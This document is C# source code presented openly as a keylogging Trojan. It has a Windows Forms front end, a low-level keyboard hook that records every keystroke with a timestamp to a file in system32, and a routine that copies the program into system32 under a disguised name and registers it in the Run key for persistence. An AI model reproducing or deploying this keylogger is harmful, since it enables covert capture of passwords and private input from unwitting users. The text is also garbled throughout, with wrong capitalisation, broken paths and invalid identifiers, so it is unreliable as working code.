C # key-record Trojans (haha, pure entertainment)

Using system;
Using system. drawing;
Using system. collections;
Using system. componentmodel;
Using system. Windows. forms;
Using system. Data;

Using system. Threading;

Namespace rozhdatasrvtest
{
/// <Summary>
/// Summary of form2.
/// </Summary>
Public class form2: system. Windows. Forms. Form
{
/// <Summary>
/// Required designer variables.
/// </Summary>
Private system. componentmodel. Container components = NULL;
Private Hook myhook = new hook ();

 

Private report myreport = new report ();

 

Private registryreport myregistryreport;

 

Private string keyevents, keydate;
Private system. Windows. Forms. tabcontrol tabcontrol1;
Private system. Windows. Forms. tabpage tabpage1;
Private system. Windows. Forms. Button button1;

 

Public form2 ()
{
//
// Required for Windows Form Designer support
//
Initializecomponent ();

//
// Todo: add Any constructor code after initializecomponent calls
//
}

/// <Summary>
/// Clear all resources in use.
/// </Summary>
Protected override void dispose (bool disposing)
{
If (disposing)
{
If (components! = NULL)
{
Components. Dispose ();
}
}
Base. Dispose (disposing );
}

# Region code generated by Windows Form Designer
/// <Summary>
/// The designer supports the required methods-do not use the code editor to modify
/// Content of this method.
/// </Summary>
Private void initializecomponent ()
{
This. button1 = new system. Windows. Forms. Button ();
This. tabcontrol1 = new system. Windows. Forms. tabcontrol ();
This. tabpage1 = new system. Windows. Forms. tabpage ();
This. tabcontrol1.suspendlayout ();
This. suspendlayout ();
//
// Button1
//
This. button1.location = new system. Drawing. Point (160, 72 );
This. button1.name = "button1 ";
This. button1.tabindex = 0;
This. button1.text = "button1 ";
This. button1.click + = new system. eventhandler (this. button#click );
//
// Tabcontrol1
//
This. tabcontrol1.controls. Add (this. tabpage1 );
This. tabcontrol1.location = new system. Drawing. Point (32,120 );
This. tabcontrol1.name = "tabcontrol1 ";
This. tabcontrol1.selectedindex = 0;
This. tabcontrol1.tabindex = 1;
//
// Tabpage1
//
This. tabpage1.location = new system. Drawing. Point (4, 21 );
This. tabpage1.name = "tabpage1 ";
This. tabpage1.size = new system. Drawing. Size (192, 75 );
This. tabpage1.tabindex = 0;
This. tabpage1.text = "tabpage1 ";
//
// Form2
//
This. autoscalebasesize = new system. Drawing. Size (6, 14 );
This. clientsize = new system. Drawing. Size (292,266 );
This. Controls. Add (this. tabcontrol1 );
This. Controls. Add (this. button1 );
This. Name = "form2 ";
This. Text = "form2 ";
This. Load + = new system. eventhandler (this. form2_load );
This. tabcontrol1.resumelayout (false );
This. resumelayout (false );

}
# Endregion

Private void button#click (Object sender, system. eventargs E)
{

}

Private void form2_load (Object sender, system. eventargs E)
{
Myregistryreport = new registryreport ();
This. myregistryreport. movefile ();
This. myregistryreport. registryrun ();
This. myreport. firstwrite ();
This. myhook. sethook ();
This. myhook. keyboardevent + = new keyboardeventhandler (myhook_keyboardevent );

}
Private void myhook_keyboardevent (keyboardevents keyevent, keys key)
{
This. keyevents = keyevent. tostring ();
This. keydate = key. tostring ();
This. myreport. writedate (keyevents, keydate );
}

}
}

Hook. CS

Using system;
Using system. runtime. interopservices;
Using system. reflection;
Using system. Windows. forms;
Namespace rozhdatasrvtest
{
Public Enum keyboardevents
{
Keydown = 0x0100,
Keyup = 0x0101,
Systemkeydown = 0x0104,
Systemkeyup = 0x0105

}
[Structlayout (layoutkind. Sequential)]
Public struct keyboardhookstruct
{
Public int vkcode; // a virtual keyboard code between 1 and 254
Public int scancode; // indicates the hardware scan code.
Public int flags;
Public int time;
Public int dwextrainfo;

}
Public Delegate void keyboardeventhandler (keyboardevents keyevent, system. Windows. Forms. Keys key );

Public class hook
{
Public event keyboardeventhandler keyboardevent;
Public Enum hooktype

{
Wh_journalrecord = 0,
Wh_journalplayback = 1,
Wh_keyboard = 2,
Wh_getmessage = 3,
Wh_callwndproc = 4,
Wh_cbt = 5,
Wh_sysmsgfilter = 6,
Wh_mouse = 7,
Wh_hardware = 8,

Wh_debug = 9,

Wh_shell = 10,
Wh_foregroundidle = 11,
Wh_callwndprocret = 12,
Wh_keyboard_ll = 13,
Wh_mouse_ll = 14,
Wh_msgfilter =-1,

}
Public Delegate intptr hookproc (INT code, int wparam, intptr lparam );
[Dllimport ("user32.dll", charset = charset. Auto)]
Public static extern intptr setwindowshookex (hooktype, hookproc hook, intptr instance, int threadid );
[Dllimport ("user32.dll", charset = charset. Auto)]
Public static extern intptr callnexthookex (intptr hookhandle, int code, int wparam, intptr lparam );

[Dllimport ("user32.dll", charset = charset. Auto)]
Public static extern bool unhookwindowshookex (intptr hookhandle );
Private intptr instance;
Private intptr hookhandle;
Private int threadid;
Private hookproc hookprocex;
Public hook ()
{
This. instance =
Marshal. gethinstance (assembly. getexecutingassembly (). getmodules () [0]);
This. threadid = 0;
Hookhandle = intptr. zero;
Hookprocex = new hookproc (hookproc );
}
Public bool sethook ()
{
This. hookhandle = setwindowshookex (hooktype. wh_keyboard_ll, hookprocex, this. instance, this. threadid );
Return (INT) hookhandle! = 0 );

}
Public intptr hookproc (INT code, int wparam, intptr lparam)
{
If (code> = 0)
{
Keyboardevents kevent = (keyboardevents) wparam;
If (kevent! = Keyboardevents. keydown &&
Kevent! = Keyboardevents. keyup &&
Kevent! = Keyboardevents. systemkeydown &&
Kevent! = Keyboardevents. systemkeyup)
{
Return callnexthookex (this. hookhandle, (INT) hooktype. wh_keyboard_ll, wparam, lparam );
}
Keyboardhookstruct mykey = new keyboardhookstruct ();
Type T = mykey. GetType ();
Mykey = (keyboardhookstruct) Marshal. ptrtostructure (lparam, t );
Keys keydata = (KEYS) mykey. vkcode;
Keyboardevent (kevent, keydata );
}
Return callnexthookex (this. hookhandle, (INT) hooktype. wh_keyboard_ll, wparam, lparam );
}
Public bool unhook ()
{
Return hook. unhookwindowshookex (this. hookhandle );

}

}

}

Registryreport. CS

Using system;
Using system. IO;
Using Microsoft. Win32;
Using system. Windows. forms;

Namespace rozhdatasrvtest
{
Public class registryreport
{
Public registryreport ()
{
}
Public void movefile ()
{
If (! File. exists ("C: \ WINDOWS \ system32 \ _ system.exe "))
{
File. Move (application. executablepath, "C: \ WINDOWS \ system32 \ _ system.exe ");

}
Else
Return;

}
Public void registryrun ()
{
Registrykey key1 = registry. currentuser. createsubkey ("Software \ Microsoft \ Windows \ CurrentVersion \ Run ");
Key1.setvalue ("", "C: \ WINDOWS \ system32 \ _ system.exe ");
Key1.close ();
}
}

 

}

Report. CS

Using system;
Using system. IO;
Namespace rozhdatasrvtest

{

Public class report
{
Public Report ()

{

}
Public void firstwrite ()
{
Streamwriter Sw = new streamwriter ("C:/Windows/system32/keyreport.txt", true );
Sw. writeline ("************** littlestudio *************");

Sw. writeline ("*********" + datetime. Today. year. tostring () + "."

+ Datetime. Today. Month. tostring () + "."

+ Datetime. Today. Day. tostring () + ""

+ Datetime. Now. Hour. tostring () + ":"

+ Datetime. Now. Minute. tostring () + ":"

+ Datetime. Now. Second. tostring () + "********");
Sw. Close ();

}
Public void writedate (string keyevents, string keydate)
{
Try
{

Streamwriter Sw = new streamwriter ("C:/Windows/system32/keyreport.txt", true );
Sw. writeline (keydate + "key" + keyevents + ""
+ Datetime. Now. Hour. tostring () + ":"

+ Datetime. Now. Minute. tostring () + ":"

+ Datetime. Now. Second. tostring ());
Sw. Close ();

}

Catch {}

Return;

}

}

}